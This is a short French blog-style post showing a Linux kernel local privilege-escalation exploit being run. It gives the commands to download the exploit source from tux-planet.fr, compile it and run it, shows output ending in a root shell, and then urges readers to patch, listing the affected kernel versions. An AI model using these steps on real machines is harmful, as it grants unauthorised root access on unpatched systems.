Voici l'exploit, tiré de tux-planet :

wget www.tux-planet.fr/public/hack/exploits/kernel/robert-you-suck.c
gcc -o robert robert-you-suck.c
./robert

et le résultat :

resolved symbol commit_creds to 0xffffffff8108bd90
resolved symbol prepare_kernel_cred to 0xffffffff8108c170
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0

# id
uid=0(root) gid=0(root) 

Bref, pensez à mettre votre kernel à jour. !

Pour ubuntu 10.04, la derniere version (2.6.32-24) est patchée contre cette faille.
Si vous avez un kernel >= 2.6.27 et <= 2.6.33-23, vous êtes attackable

edit:
pour ubuntu, allez lire cette page qui indique les versions sécurisées par rapport à cette faille.
pour debian allez lire cette page